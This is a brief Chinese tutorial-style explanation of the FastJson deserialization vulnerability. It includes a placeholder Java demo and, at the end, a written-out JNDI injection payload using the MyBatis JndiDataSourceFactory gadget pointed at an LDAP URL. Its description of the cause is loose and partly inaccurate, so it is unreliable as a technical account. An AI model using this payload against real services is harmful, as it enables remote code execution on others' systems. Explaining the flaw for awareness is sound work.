FastJson 是阿里巴巴开源的一个 JSON 解析库,因其高性能和便捷的 API 被广泛使用。FastJson 曾经发生过反序列化漏洞。这个漏洞允许攻击者通过构造特定的 JSON 数据来触发远程代码执行。

目录 隐藏目录
漏洞原因:
简单示例:

漏洞原因:

FastJson 反序列化漏洞的根本原因是它支持将 JSON 数据转换为 Java 对象,而在这个转换过程中,FastJson 会执行其中包含的任意 Java 代码。攻击者可以构造恶意的 JSON 数据,其中包含特定的类名和恶意代码,当 FastJson 尝试将这个 JSON 数据反序列化为 Java 对象时,就会触发恶意代码的执行。

漏洞的具体原因与 FastJson 在反序列化时对类型信息的处理有关。FastJson 默认情况下会尝试使用类加载器加载指定的类,并执行其中的方法。攻击者可以通过构造特定的 JSON 数据来绕过 FastJson 的安全检查,导致执行恶意代码。

简单示例:

以下演示了 FastJson 反序列化漏洞:

import com.alibaba.fastjson.JSON;

public class FastJsonVulnerabilityDemo {
    public static void main(String[] args) {
        // 构造恶意的 JSON 数据,其中包含一个恶意类的引用和恶意代码
        String maliciousJson = "{\"@type\":\"com.example.MaliciousClass\",\"data\":\"<恶意代码>\"}";

        // 反序列化恶意 JSON 数据
        Object obj = JSON.parse(maliciousJson);
        System.out.println("Deserialized object: " + obj);
    }
}

在这个示例中,攻击者构造了一个恶意的 JSON 数据,其中包含了一个恶意类 com.example.MaliciousClass 的引用和恶意代码。当 FastJson 尝试将这个 JSON 数据反序列化为 Java 对象时,就会触发恶意类的加载和其中恶意代码的执行。

攻击者可以利用这个漏洞来执行任意代码,例如构造

{“@type”:”org.apache.ibatis.datasource.jndi.JndiDataSourceFactory”,”properties”:{“data_source”:”ldap://localhost:1111/Exploit”}}

远程命令执行操作,从而造成严重的安全问题。